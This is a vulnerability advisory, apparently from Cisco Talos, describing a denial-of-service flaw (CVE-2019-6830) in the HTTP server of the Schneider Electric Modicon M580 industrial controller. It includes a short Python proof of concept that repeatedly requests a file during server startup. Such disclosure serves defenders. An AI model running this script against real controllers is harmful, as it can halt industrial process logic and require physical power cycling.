CVE-2019-6830
An exploitable denial of service vulnerability exists in the HTTP request processing of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. An appropriately timed HTTP request can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.
Schneider Electric Modicon M580 BMEP582040 SV2.70
https://www.schneider-electric.com/en/work/campaign/m580-epac/
5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-248: Uncaught Exception
The Modicon M580 is the latest in Schneider Electric’s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.
When a HTTP request to an existing resource is sent during the intialization process of the device’s HTTP server, it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.
In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.
import requests
from time import sleep
def main():
rhost = "192.168.10.1"
uri = "http://%s/cabs/RdePocket.CAB" % (rhost)
max_tries = 100
results = []
for i in xrange(max_tries):
try:
res = requests.get(uri, timeout=10)
results.append(res)
except:
sleep(0.1)
if __name__ == '__main__':
main()
2019-04-10 - Vendor Disclosure 2019-08-13 - Vendor Patched; Public Release
Discovered by Jared Rittle of Cisco Talos.